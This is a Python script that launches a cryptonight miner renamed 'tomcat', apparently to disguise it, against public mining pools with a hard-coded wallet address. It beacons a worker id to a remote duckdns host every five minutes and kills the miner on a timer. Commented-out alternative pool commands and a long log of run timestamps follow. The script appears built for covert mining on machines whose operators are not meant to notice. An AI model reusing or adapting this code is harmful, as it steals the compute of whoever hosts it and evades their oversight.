import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:29:05.017756
#2018-02-17 16:16:03.979501
#2018-02-17 18:03:04.638971
#2018-02-17 19:50:08.422723
#2018-02-17 21:39:06.107659
#2018-02-17 23:23:05.807186
#2018-02-18 01:12:06.407778
#2018-02-18 03:01:07.274263
#2018-02-18 04:49:07.458068
#2018-02-18 06:39:04.650396
#2018-02-18 08:28:06.280570
#2018-02-18 10:15:07.584395
#2018-02-18 12:01:04.826889
#2018-02-18 13:46:06.310675
#2018-02-18 15:37:06.303096
#2018-02-18 17:26:07.088891
#2018-02-18 19:14:02.118504
#2018-02-18 21:00:08.833998
#2018-02-18 22:46:05.969291
#2018-02-19 00:35:08.660769
#2018-02-19 02:21:05.980281
#2018-02-19 04:08:01.319860
#2018-02-19 05:52:05.444179
#2018-02-19 07:42:04.342695
#2018-02-19 09:31:06.397384
#2018-02-19 11:21:05.147537
#2018-02-19 13:08:01.474074
#2018-02-19 14:56:02.151558
#2018-02-19 16:46:01.646373
#2018-02-19 18:35:07.955868
#2018-02-19 20:20:01.349117
#2018-02-19 22:09:05.405484
#2018-02-19 23:56:07.274180
#2018-02-20 01:43:07.944002
#2018-02-20 03:32:05.169923
#2018-02-20 05:20:08.678052
#2018-02-20 07:04:04.831184
#2018-02-20 08:49:02.204139
#2018-02-20 10:32:09.349812
#2018-02-20 12:17:07.852752
#2018-02-20 14:06:08.347537
#2018-02-20 15:49:08.867298
#2018-02-20 17:33:05.304959
#2018-02-20 19:20:08.978777
#2018-02-20 21:09:02.070349
#2018-02-20 22:55:08.131445
#2018-02-21 00:39:06.798134
#2018-02-21 02:25:08.390611
#2018-02-21 04:13:03.233159
#2018-02-21 06:01:07.267328
#2018-02-21 08:00:09.897665
#2018-02-21 09:47:04.971318
#2018-02-21 11:36:08.551961
#2018-02-21 13:27:01.548170
#2018-02-21 15:12:05.692054
#2018-02-21 17:03:10.135631
#2018-02-21 18:50:10.075954
#2018-02-21 20:39:05.490414
#2018-02-21 22:25:01.799909
#2018-02-22 00:14:07.999136
#2018-02-22 02:03:08.456862
#2018-02-22 03:49:06.742974
#2018-02-22 05:36:04.695809
#2018-02-22 07:21:02.104860
#2018-02-22 09:08:04.615084
#2018-02-22 10:56:06.520903
#2018-02-22 12:43:01.319696
#2018-02-22 14:29:10.642027
#2018-02-22 16:17:08.399336
#2018-02-22 18:04:06.997720
#2018-02-22 19:54:14.719702
#2018-02-22 21:45:10.817798
#2018-02-22 23:33:02.020394
#2018-02-23 01:20:06.260961
#2018-02-23 03:07:01.815803
#2018-02-23 04:53:07.012756
#2018-02-23 06:39:05.212822
#2018-02-23 08:27:01.546708
#2018-02-23 10:43:04.225218
#2018-02-23 12:40:09.994505
#2018-02-23 14:24:10.111358
#2018-02-23 16:17:01.388749
#2018-02-23 18:03:04.218450
#2018-02-23 19:48:04.121813
#2018-02-23 21:33:04.293290
#2018-02-23 23:22:07.083155
#2018-02-24 01:13:07.422909
#2018-02-24 03:03:06.120914
#2018-02-24 04:49:05.865153
#2018-02-24 06:34:07.876312
#2018-02-24 08:23:04.321258
#2018-02-24 10:06:04.954681
#2018-02-24 12:04:01.505564
#2018-02-24 13:51:02.099449
#2018-02-24 15:42:03.531130
#2018-02-24 17:36:01.898473
#2018-02-24 19:22:04.742498
#2018-02-24 21:12:05.450330
#2018-02-25 01:13:02.115173
#2018-02-25 05:01:03.945091
#2018-02-25 09:46:01.326731